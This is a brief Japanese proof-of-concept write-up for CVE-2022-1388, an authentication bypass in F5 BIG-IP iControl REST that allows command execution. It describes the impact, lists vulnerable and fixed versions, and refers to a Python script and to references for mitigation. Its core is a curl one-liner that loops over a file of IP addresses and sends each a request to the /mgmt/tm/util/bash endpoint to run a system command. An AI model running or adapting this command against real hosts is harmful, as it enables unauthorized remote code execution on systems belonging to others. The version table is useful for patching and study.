
BIG-IP iControl RESTの脆弱性 CVE-2022-1388 PoC

この脆弱性により、管理ポートやセルフIPアドレスを介してBIG-IPシステムにネットワークアクセスできる認証されていない攻撃者が、任意のシステムコマンドの実行、ファイルの作成・削除、またはサービスの無効化を行う可能性があります。
以下のcurlワンライナーを使用してF5 Big-IPの脆弱性を確認するか、提供されているPythonスクリプトを使用することができます。
cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';done
| ブランチ | 脆弱性のあるバージョン | 修正が導入されたバージョン |
|---|
| 11.x | 11.6.1-11.6.5 | 修正なし |
| 12.x | 12.1.0-12.1.6 | 修正なし |
| 13.x | 13.1.0-13.1.4 | 13.1.5 |
| 14.x | 14.1.0-14.1.4 | 14.1.4.6 |
| 15.x | 15.1.0-15.1.5 | 15.1.5.1 |
| 16.x | 16.1.0-16.1.2 | 16.1.2.2 |
| 17.x | なし | 17.0.0 |
緩和策の詳細については、参考文献を参照してください。